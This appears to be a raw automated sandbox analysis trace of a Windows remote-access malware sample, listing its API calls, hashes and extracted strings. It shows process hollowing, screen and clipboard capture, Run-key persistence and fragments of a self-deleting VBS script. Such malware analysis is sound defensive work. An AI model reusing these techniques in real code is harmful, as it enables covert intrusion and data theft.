  • Part of subcall function 004137AA: RegSetValueExA.KERNELBASE(?,004674C8,00000000,?,00000000,00000000,00475300,?,?,0040F88E,004674C8,5.2.0 Pro), ref: 004137E1
  • Part of subcall function 004137AA: RegCloseKey.KERNELBASE(?,?,?,0040F88E,004674C8,5.2.0 Pro), ref: 004137EC
Strings
Memory Dump Source
• Source File: 00000008.00000002.2959285882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_400000_AddInProcess32.jbxd
Yara matches
Similarity
• API ID: CloseCreateInfoParametersSystemValue
• String ID: Control Panel\Desktop$TileWallpaper$WallpaperStyle
• API String ID: 4127273184-3576401099
• Opcode ID: 0770bf726c9befaa45485f0dd67d4366664ca8a7637528448030d37bd09e249f
• Instruction ID: 8ac436d711b2fc3476497f69dc57c3b9a547a247a31514f467319d0910454585
• Opcode Fuzzy Hash: 0770bf726c9befaa45485f0dd67d4366664ca8a7637528448030d37bd09e249f
• Instruction Fuzzy Hash: D7118472BC425022E81831396D9BFBE28068343F61F54456BF6022A6CAE4CF6A9143CF
APIs
• SystemParametersInfoW.USER32(00000014,00000000,00000000,00000003), ref: 0041CB68
  • Part of subcall function 004137AA: RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 004137B9
  • Part of subcall function 004137AA: RegSetValueExA.KERNELBASE(?,004674C8,00000000,?,00000000,00000000,00475300,?,?,0040F88E,004674C8,5.2.0 Pro), ref: 004137E1
  • Part of subcall function 004137AA: RegCloseKey.KERNELBASE(?,?,?,0040F88E,004674C8,5.2.0 Pro), ref: 004137EC
Strings
Memory Dump Source
• Source File: 00000008.00000002.2959285882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_400000_AddInProcess32.jbxd
Yara matches
Similarity
• API ID: CloseCreateInfoParametersSystemValue
• String ID: Control Panel\Desktop$TileWallpaper$WallpaperStyle
• API String ID: 4127273184-3576401099
• Opcode ID: 44ea0df9bd10d1232a8db12fadab67e0168899acaa20bfaa619f1365e862af88
• Instruction ID: 1d4fccf664b116fd7e9026c1daa93839c24cbfeedf45b0e65449f5778d70c30d
• Opcode Fuzzy Hash: 44ea0df9bd10d1232a8db12fadab67e0168899acaa20bfaa619f1365e862af88
• Instruction Fuzzy Hash: DBF0C272BC421022D82931B96DAFBFE18058742F61F15412BF302652CAD4CE6A81428F
APIs
  • Part of subcall function 00448295: GetLastError.KERNEL32(00000020,?,0043A875,?,?,?,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B), ref: 00448299
  • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
  • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 0044830D
  • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
• IsValidCodePage.KERNEL32(00000000), ref: 00451E3A
• _wcschr.LIBVCRUNTIME ref: 00451ECA
• _wcschr.LIBVCRUNTIME ref: 00451ED8
• GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,?,00000000,?), ref: 00451F7B
Memory Dump Source
• Source File: 00000008.00000002.2959285882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_400000_AddInProcess32.jbxd
Yara matches
Similarity
• API ID: ErrorLast_wcschr$CodeInfoLocalePageValid_abort_free
• String ID:
• API String ID: 4212172061-0
• Opcode ID: 715b93ef3f017ee4fea0110e94a068843382a27aff4af5d2daf4b4fdd25eb79d
• Instruction ID: 2c98265d6c7a89d72caae9d33925a6d6107158c78f730362dcab12f0c71d6669
• Opcode Fuzzy Hash: 715b93ef3f017ee4fea0110e94a068843382a27aff4af5d2daf4b4fdd25eb79d
• Instruction Fuzzy Hash: 7F611976600606AAD714AB75CC42FBB73A8EF04306F14056FFD05DB292EB78E948C769
APIs
• _free.LIBCMT ref: 0044943D
  • Part of subcall function 00446802: HeapFree.KERNEL32(00000000,00000000,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?), ref: 00446818
  • Part of subcall function 00446802: GetLastError.KERNEL32(?,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?,?), ref: 0044682A
• GetTimeZoneInformation.KERNEL32 ref: 0044944F
• WideCharToMultiByte.KERNEL32(00000000,?,00472764,000000FF,?,0000003F,?,?), ref: 004494C7
• WideCharToMultiByte.KERNEL32(00000000,?,004727B8,000000FF,?,0000003F,?,?,?,00472764,000000FF,?,0000003F,?,?), ref: 004494F4
Memory Dump Source
• Source File: 00000008.00000002.2959285882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_400000_AddInProcess32.jbxd
Yara matches
Similarity
• API ID: ByteCharMultiWide$ErrorFreeHeapInformationLastTimeZone_free
• String ID:
• API String ID: 806657224-0
• Opcode ID: aeb37be2ef55a5d103ab6b4be93faccb032caed00e04dd613037f001c8cf3bb4
• Instruction ID: d52e19fe16dfdee109f40d049db845c42e01460133d57766726f1505d2785bee
• Opcode Fuzzy Hash: aeb37be2ef55a5d103ab6b4be93faccb032caed00e04dd613037f001c8cf3bb4
• Instruction Fuzzy Hash: 2D31F371904205EFDB15DF69CE8186EBBB8FF0572072446AFE024A73A1D3748D41EB28
                                                                                                APIs
                                                                                                  • Part of subcall function 00448295: GetLastError.KERNEL32(00000020,?,0043A875,?,?,?,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B), ref: 00448299
                                                                                                  • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
                                                                                                  • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 0044830D
                                                                                                  • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
                                                                                                  • Part of subcall function 00448295: _free.LIBCMT ref: 004482F4
                                                                                                  • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 00448301
                                                                                                • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00452197
                                                                                                • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 004521E8
                                                                                                • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 004522A8
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.2959285882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_400000_AddInProcess32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: ErrorInfoLastLocale$_free$_abort
                                                                                                • String ID:
                                                                                                • API String ID: 2829624132-0
                                                                                                • Opcode ID: 711793eb573856c12bfad09b44d2354213151b00c391b4c97ce46ce3e25352d9
                                                                                                • Instruction ID: 283aa9570716a6929da4b93cb0bca45b8c77d553a5ebfd19e37a994bad1de6ac
                                                                                                • Opcode Fuzzy Hash: 711793eb573856c12bfad09b44d2354213151b00c391b4c97ce46ce3e25352d9
                                                                                                • Instruction Fuzzy Hash: F361A235500207ABDF289F24CE82B7A77A8EF05306F1441BBED05C6656E7BC9D89CB58
APIs
• IsDebuggerPresent.KERNEL32 ref: 0043BC69
• SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0043BC73
• UnhandledExceptionFilter.KERNEL32(?), ref: 0043BC80
Memory Dump Source
• Source File: 00000008.00000002.2959285882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_400000_AddInProcess32.jbxd
Yara matches
Similarity
• API ID: ExceptionFilterUnhandled$DebuggerPresent
• String ID:
• API String ID: 3906539128-0
• Opcode ID: 1e0b73e88f7870ac8a7e49df57248e9339733cda2bb7518ac33a0b9eb889d704
• Instruction ID: 25e88f5a56b9fbea854716c485460a06fbe33a825339a9765be54c88dd7cea35
• Opcode Fuzzy Hash: 1e0b73e88f7870ac8a7e49df57248e9339733cda2bb7518ac33a0b9eb889d704
• Instruction Fuzzy Hash: 0431D374901218ABCB21DF65D9887CDBBB8EF0C311F5051EAE81CA7251EB749F818F48
APIs
• CryptAcquireContextA.ADVAPI32(00000000,00000000,00000000,00000001,F0000000,?,00000000,00433550,00000034,?,?,00000000), ref: 004338DA
• CryptGenRandom.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,?,?,004335E3,00000000,?,00000000), ref: 004338F0
• CryptReleaseContext.ADVAPI32(00000000,00000000,?,?,?,?,?,?,?,?,?,004335E3,00000000,?,00000000,0041E2E2), ref: 00433902
Memory Dump Source
• Source File: 00000008.00000002.2959285882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_400000_AddInProcess32.jbxd
Yara matches
Similarity
• API ID: Crypt$Context$AcquireRandomRelease
• String ID:
• API String ID: 1815803762-0
• Opcode ID: 81ae4bbc27a0383ddd18646ed4cc5f88ed8aa0b0f15284250c3048956b898281
• Instruction ID: d68cd6f5f98cbfa2ab0450769c499d20ea76a36e668e3df749659bd42d9a4b78
• Opcode Fuzzy Hash: 81ae4bbc27a0383ddd18646ed4cc5f88ed8aa0b0f15284250c3048956b898281
• Instruction Fuzzy Hash: 40E09A31208310FBEB301F21AC08F573AA5EF89B66F200A3AF256E40E4D6A68801965C
APIs
• GetCurrentProcess.KERNEL32(?,?,0044332B,?), ref: 00443376
• TerminateProcess.KERNEL32(00000000,?,0044332B,?), ref: 0044337D
• ExitProcess.KERNEL32 ref: 0044338F
Memory Dump Source
• Source File: 00000008.00000002.2959285882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_400000_AddInProcess32.jbxd
Yara matches
Similarity
• API ID: Process$CurrentExitTerminate
• String ID:
• API String ID: 1703294689-0
• Opcode ID: 4e3b9aa1e9039f050651c305726e439f17232b6e89e74059b12d513dd76054c6
• Instruction ID: 4b22f3a5ffe79ca7dfb81d814e561f82a31e4bef9a776fe0bb9daccb8e878f4b
• Opcode Fuzzy Hash: 4e3b9aa1e9039f050651c305726e439f17232b6e89e74059b12d513dd76054c6
• Instruction Fuzzy Hash: 9FE0B635401608FBDF11AF55DE09A5D3BAAEB40B56F005469FC498A272CF79EE42CB88
APIs
• OpenClipboard.USER32(00000000), ref: 0040B74C
• GetClipboardData.USER32(0000000D), ref: 0040B758
• CloseClipboard.USER32 ref: 0040B760
Memory Dump Source
• Source File: 00000008.00000002.2959285882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_400000_AddInProcess32.jbxd
Yara matches
Similarity
• API ID: Clipboard$CloseDataOpen
• String ID:
• API String ID: 2058664381-0
• Opcode ID: ee7560bd864c47a473b03ccd03fab4bf0c670c3a92a751b3696d255e79ff2f15
• Instruction ID: 1c65eecdd0087a0ffd0b0a04a5b63b9ff0c479b34dfa65f2e767e94bdce73387
• Opcode Fuzzy Hash: ee7560bd864c47a473b03ccd03fab4bf0c670c3a92a751b3696d255e79ff2f15
• Instruction Fuzzy Hash: 45E0EC31745320EFC3206B609C49F9B6AA4DF85B52F05443AB905BB2E5DB78CC4086AD
APIs
• GetLocaleInfoW.KERNEL32(00000000,00000002,00000000,?,20001004,?,20001004,?,00000002,?,?,?,?,00000004), ref: 004489C0
Strings
Memory Dump Source
• Source File: 00000008.00000002.2959285882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_400000_AddInProcess32.jbxd
Yara matches
Similarity
• API ID: InfoLocale
• String ID: GetLocaleInfoEx
• API String ID: 2299586839-2904428671
• Opcode ID: 53574c2ecf56bfb558b2c309ca3eb91f9c7a0a18e0f2245662e0b0bedf18becb
• Instruction ID: 58f0578312c774904006f9ed4749830948a62bec6dc8fde4d932476f73229d15
• Opcode Fuzzy Hash: 53574c2ecf56bfb558b2c309ca3eb91f9c7a0a18e0f2245662e0b0bedf18becb
• Instruction Fuzzy Hash: C0F0F631640608FBDB016F61DC06F6E7B25EB04751F00056EFC0966251DE368D2096DE
APIs
• GetProcessHeap.KERNEL32(00000000,00000000,?,00000000,00411F72,?,?,?,?,?), ref: 00412122
• HeapFree.KERNEL32(00000000,?,?,?,?,?), ref: 00412129
Memory Dump Source
• Source File: 00000008.00000002.2959285882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_400000_AddInProcess32.jbxd
Yara matches
Similarity
• API ID: Heap$FreeProcess
• String ID:
• API String ID: 3859560861-0
• Opcode ID: 5801a203d1619bed6c8a9db4d4e6f7c09651a2c1722533c7d7743465b50f68e9
• Instruction ID: dd486cb6b879bf1be37f4e59d5b3b18419fca2aff5c7e471244091183f2ba527
• Opcode Fuzzy Hash: 5801a203d1619bed6c8a9db4d4e6f7c09651a2c1722533c7d7743465b50f68e9
• Instruction Fuzzy Hash: 0D113632000B11AFC7309F54DE85957BBEAFF08715305892EF29682922CB75FCA0CB48
APIs
• IsProcessorFeaturePresent.KERNEL32(0000000A,00000000), ref: 00434CCF
Memory Dump Source
• Source File: 00000008.00000002.2959285882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_400000_AddInProcess32.jbxd
Yara matches
Similarity
• API ID: FeaturePresentProcessor
• String ID:
• API String ID: 2325560087-0
• Opcode ID: 4259bdeace04940204f61aa74a979230364aaba3051b8f8e0efcae6fb7ed6494
• Instruction ID: 5e37b39ef68b784d6588b9ddffa6793edf4c3ade0924e8be62ba08be237937aa
• Opcode Fuzzy Hash: 4259bdeace04940204f61aa74a979230364aaba3051b8f8e0efcae6fb7ed6494
• Instruction Fuzzy Hash: E4515B71D002488FEB24CF69D98579EBBF4FB88314F24956BD419EB264D378A940CF98
APIs
  • Part of subcall function 00448295: GetLastError.KERNEL32(00000020,?,0043A875,?,?,?,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B), ref: 00448299
  • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
  • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 0044830D
  • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
  • Part of subcall function 00448295: _free.LIBCMT ref: 004482F4
  • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 00448301
• GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 004523E7
Memory Dump Source
• Source File: 00000008.00000002.2959285882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_400000_AddInProcess32.jbxd
Yara matches
Similarity
• API ID: ErrorLast$_free$InfoLocale_abort
• String ID:
• API String ID: 1663032902-0
• Opcode ID: b4047fd74fafd511f87100a415ff7352fa71784cc782813174b617cf7262d9f7
• Instruction ID: 2d4dd0c1c30cd12b50dfb53a4a1f7f5f9091958bb121381f53cce851c87d7921
• Opcode Fuzzy Hash: b4047fd74fafd511f87100a415ff7352fa71784cc782813174b617cf7262d9f7
• Instruction Fuzzy Hash: F921D632600606ABDB249F25DD41FBB73A8EB06316F10407FED01D6152EBBC9D48CB59
APIs
  • Part of subcall function 00448295: GetLastError.KERNEL32(00000020,?,0043A875,?,?,?,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B), ref: 00448299
  • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
  • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 0044830D
  • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
• EnumSystemLocalesW.KERNEL32(00452143,00000001), ref: 0045208D
Memory Dump Source
• Source File: 00000008.00000002.2959285882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_400000_AddInProcess32.jbxd
Yara matches
Similarity
• API ID: ErrorLast$EnumLocalesSystem_abort_free
• String ID:
• API String ID: 1084509184-0
• Opcode ID: cd62537e8c3e003b13522b9155b4eea68fe7d0001d8d421cd242523031e004a2
• Instruction ID: b0e9e6415e7ea3a3ed95e939ef0edb9d062384d4a1a0bde9f31cc9ceae225fa6
• Opcode Fuzzy Hash: cd62537e8c3e003b13522b9155b4eea68fe7d0001d8d421cd242523031e004a2
• Instruction Fuzzy Hash: 0211553A2007019FDB189F39C9916BBBB92FF8075AB14482EEE4687B41D7B5A946C740
APIs
  • Part of subcall function 00448295: GetLastError.KERNEL32(00000020,?,0043A875,?,?,?,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B), ref: 00448299
  • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
  • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 0044830D
  • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
• GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,00452361,00000000,00000000,?), ref: 004525EF
Memory Dump Source
• Source File: 00000008.00000002.2959285882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_400000_AddInProcess32.jbxd
Yara matches
Similarity
• API ID: ErrorLast$InfoLocale_abort_free
• String ID:
• API String ID: 2692324296-0
• Opcode ID: ed905f4e10f5b376defebc36d7d97aa2bb2c1abe5f1ea1ee61b46868c197e3f5
• Instruction ID: 8c29d710edde3bbc403447a64c1727e90569dbd09ff88c71ffccea9529c81983
• Opcode Fuzzy Hash: ed905f4e10f5b376defebc36d7d97aa2bb2c1abe5f1ea1ee61b46868c197e3f5
• Instruction Fuzzy Hash: C4F04936A00116BBDB245A24D905BBF7B58EB01315F04446BEC05A3241FAF8FD058694
APIs
  • Part of subcall function 00448295: GetLastError.KERNEL32(00000020,?,0043A875,?,?,?,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B), ref: 00448299
  • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
  • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 0044830D
  • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
• EnumSystemLocalesW.KERNEL32(00452393,00000001), ref: 00452102
Memory Dump Source
• Source File: 00000008.00000002.2959285882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_400000_AddInProcess32.jbxd
Yara matches
Similarity
• API ID: ErrorLast$EnumLocalesSystem_abort_free
• String ID:
• API String ID: 1084509184-0
• Opcode ID: b47e8d7704c3cea33439bb1b9c4b2a0344765dc89a2caae7295f0002ba586764
• Instruction ID: 883a99871793c155097d9da94a803295819168bd30f8f35cc04eca091e96b9f4
• Opcode Fuzzy Hash: b47e8d7704c3cea33439bb1b9c4b2a0344765dc89a2caae7295f0002ba586764
• Instruction Fuzzy Hash: E8F0FF363007056FDB245F399881A6B7B96FB82769B04482EFE458B682DAB99C42D604
                                                                                                APIs
                                                                                                  • Part of subcall function 00445909: EnterCriticalSection.KERNEL32(-0006D41D,?,0044305C,00000000,0046E938,0000000C,00443017,?,?,?,00445BA7,?,?,0044834A,00000001,00000364), ref: 00445918
                                                                                                • EnumSystemLocalesW.KERNEL32(Function_0004843E,00000001,0046EAE0,0000000C), ref: 004484BC
                                                                                                • API ID: CriticalEnterEnumLocalesSectionSystem
                                                                                                • String ID:
                                                                                                APIs
                                                                                                  • Part of subcall function 00448295: GetLastError.KERNEL32(00000020,?,0043A875,?,?,?,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B), ref: 00448299
                                                                                                  • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
                                                                                                  • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 0044830D
                                                                                                  • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
                                                                                                • EnumSystemLocalesW.KERNEL32(00451F27,00000001), ref: 00452007
                                                                                                • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                                                                                • String ID:
                                                                                                APIs
                                                                                                • SetUnhandledExceptionFilter.KERNEL32(Function_00034BE4,0043490B), ref: 00434BDD
                                                                                                • API ID: ExceptionFilterUnhandled
                                                                                                • String ID:
                                                                                                APIs
                                                                                                • CreateDCA.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00418ECB
                                                                                                • CreateCompatibleDC.GDI32(00000000), ref: 00418ED8
                                                                                                  • Part of subcall function 00419360: EnumDisplaySettingsW.USER32(?,000000FF,?), ref: 00419390
                                                                                                • CreateCompatibleBitmap.GDI32(00000000,?), ref: 00418F4E
                                                                                                • DeleteDC.GDI32(00000000), ref: 00418F65
                                                                                                • DeleteDC.GDI32(00000000), ref: 00418F68
                                                                                                • DeleteObject.GDI32(00000000), ref: 00418F6B
                                                                                                • SelectObject.GDI32(00000000,00000000), ref: 00418F8C
                                                                                                • DeleteDC.GDI32(00000000), ref: 00418F9D
                                                                                                • DeleteDC.GDI32(00000000), ref: 00418FA0
                                                                                                • StretchBlt.GDI32(00000000,00000000,00000000,?,?,00000000,?,?,?,?,00CC0020), ref: 00418FC4
                                                                                                • GetIconInfo.USER32(?,?), ref: 00418FF8
                                                                                                • DeleteObject.GDI32(?), ref: 00419027
                                                                                                • DeleteObject.GDI32(?), ref: 00419034
                                                                                                • DrawIcon.USER32(00000000,?,?,?), ref: 00419041
                                                                                                • BitBlt.GDI32(00000000,00000000,00000000,?,?,00000000,00000000,00000000,00660046), ref: 00419077
                                                                                                • GetObjectA.GDI32(00000000,00000018,?), ref: 004190A3
                                                                                                • LocalAlloc.KERNEL32(00000040,00000001), ref: 00419110
                                                                                                • GlobalAlloc.KERNEL32(00000000,?), ref: 0041917F
                                                                                                • GetDIBits.GDI32(00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 004191A3
                                                                                                • DeleteDC.GDI32(?), ref: 004191B7
                                                                                                • DeleteDC.GDI32(00000000), ref: 004191BA
                                                                                                • DeleteObject.GDI32(00000000), ref: 004191BD
                                                                                                • GlobalFree.KERNEL32(?), ref: 004191C8
                                                                                                • DeleteObject.GDI32(00000000), ref: 0041927C
                                                                                                • GlobalFree.KERNEL32(?), ref: 00419283
                                                                                                • DeleteDC.GDI32(?), ref: 00419293
                                                                                                • DeleteDC.GDI32(00000000), ref: 0041929E
                                                                                                • API ID: Delete$Object$CreateGlobal$AllocCompatibleFreeIcon$BitmapBitsDisplayDrawEnumInfoLocalSelectSettingsStretch
                                                                                                • String ID: DISPLAY
                                                                                                APIs
                                                                                                • GetModuleHandleA.KERNEL32(ntdll,ZwCreateSection,00000000,00000000), ref: 00418171
                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 00418174
                                                                                                • GetModuleHandleA.KERNEL32(ntdll,ZwMapViewOfSection), ref: 00418185
                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 00418188
                                                                                                • GetModuleHandleA.KERNEL32(ntdll,ZwUnmapViewOfSection), ref: 00418199
                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 0041819C
                                                                                                • GetModuleHandleA.KERNEL32(ntdll,ZwClose), ref: 004181AD
                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 004181B0
                                                                                                • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 00418252
                                                                                                • VirtualAlloc.KERNEL32(00000000,00000004,00001000,00000004), ref: 0041826A
                                                                                                • GetThreadContext.KERNEL32(?,00000000), ref: 00418280
                                                                                                • ReadProcessMemory.KERNEL32(?,?,?,00000004,?), ref: 004182A6
                                                                                                • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 00418328
                                                                                                • TerminateProcess.KERNEL32(?,00000000), ref: 0041833C
                                                                                                • GetCurrentProcess.KERNEL32(?,00000000,00000000,00000000,?,00000001,00000000,00000040), ref: 0041837C
                                                                                                • WriteProcessMemory.KERNEL32(?,?,?,00000004,00000000), ref: 00418446
                                                                                                • SetThreadContext.KERNEL32(?,00000000), ref: 00418463
                                                                                                • ResumeThread.KERNEL32(?), ref: 00418470
                                                                                                • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 00418487
                                                                                                • GetCurrentProcess.KERNEL32(?), ref: 00418492
                                                                                                • TerminateProcess.KERNEL32(?,00000000), ref: 004184AD
                                                                                                • GetLastError.KERNEL32 ref: 004184B5
                                                                                                • API ID: Process$AddressHandleModuleProc$ThreadVirtual$ContextCurrentFreeMemoryTerminate$AllocCreateErrorLastReadResumeWrite
                                                                                                • String ID: ZwClose$ZwCreateSection$ZwMapViewOfSection$ZwUnmapViewOfSection$ntdll
                                                                                                APIs
                                                                                                  • Part of subcall function 0041288B: TerminateProcess.KERNEL32(00000000,pth_unenc,0040F903), ref: 0041289B
                                                                                                  • Part of subcall function 0041288B: WaitForSingleObject.KERNEL32(000000FF), ref: 004128AE
                                                                                                • GetModuleFileNameW.KERNEL32(00000000,?,00000208,?,?,00000000), ref: 0040D558
                                                                                                • RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 0040D56B
                                                                                                • SetFileAttributesW.KERNEL32(?,00000080,?,?,00000000), ref: 0040D584
                                                                                                • SetFileAttributesW.KERNEL32(00000000,00000080,?,?,00000000), ref: 0040D5B4
                                                                                                  • Part of subcall function 0040B8E7: TerminateThread.KERNEL32(0040A2B8,00000000,00475300,pth_unenc,0040D0F3,004752E8,00475300,?,pth_unenc), ref: 0040B8F6
                                                                                                  • Part of subcall function 0040B8E7: UnhookWindowsHookEx.USER32(00475100), ref: 0040B902
                                                                                                  • Part of subcall function 0040B8E7: TerminateThread.KERNEL32(Function_0000A2A2,00000000,?,pth_unenc), ref: 0040B910
                                                                                                  • Part of subcall function 0041C482: CreateFileW.KERNELBASE(00000000,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,00466478,00000000,00000000,0040D434,00000000,00000000,fso.DeleteFile(Wscript.ScriptFullName)), ref: 0041C4C1
                                                                                                • ShellExecuteW.SHELL32(00000000,open,00000000,00466478,00466478,00000000), ref: 0040D7FF
                                                                                                • ExitProcess.KERNEL32 ref: 0040D80B
                                                                                                • API ID: File$Terminate$AttributesProcessThread$CreateDeleteExecuteExitHookModuleNameObjectShellSingleUnhookWaitWindows
                                                                                                • String ID: """, 0$")$@qF$@qF$CreateObject("WScript.Shell").Run "cmd /c ""$HSG$On Error Resume Next$Set fso = CreateObject("Scripting.FileSystemObject")$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Temp$\update.vbs$exepath$fso.DeleteFile "$fso.DeleteFile(Wscript.ScriptFullName)$fso.DeleteFolder "$open$tMG$wend$while fso.FileExists("
                                                                                                APIs
                                                                                                  • Part of subcall function 0041288B: TerminateProcess.KERNEL32(00000000,pth_unenc,0040F903), ref: 0041289B
                                                                                                  • Part of subcall function 0041288B: WaitForSingleObject.KERNEL32(000000FF), ref: 004128AE
                                                                                                • GetModuleFileNameW.KERNEL32(00000000,?,00000208,?,?,?,?,?,00475300,?,pth_unenc), ref: 0040D1E0
                                                                                                • RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 0040D1F3
                                                                                                • SetFileAttributesW.KERNEL32(00000000,00000080,?,?,?,?,?,00475300,?,pth_unenc), ref: 0040D223
                                                                                                • SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,00475300,?,pth_unenc), ref: 0040D232
                                                                                                  • Part of subcall function 0040B8E7: TerminateThread.KERNEL32(0040A2B8,00000000,00475300,pth_unenc,0040D0F3,004752E8,00475300,?,pth_unenc), ref: 0040B8F6
                                                                                                  • Part of subcall function 0040B8E7: UnhookWindowsHookEx.USER32(00475100), ref: 0040B902
                                                                                                  • Part of subcall function 0040B8E7: TerminateThread.KERNEL32(Function_0000A2A2,00000000,?,pth_unenc), ref: 0040B910
                                                                                                  • Part of subcall function 0041BA09: GetCurrentProcessId.KERNEL32(00000000,74DF3530,00000000,?,?,?,?,00466478,0040D248,.vbs,?,?,?,?,?,00475300), ref: 0041BA30
                                                                                                • ShellExecuteW.SHELL32(00000000,open,00000000,00466478,00466478,00000000), ref: 0040D44D
                                                                                                • ExitProcess.KERNEL32 ref: 0040D454
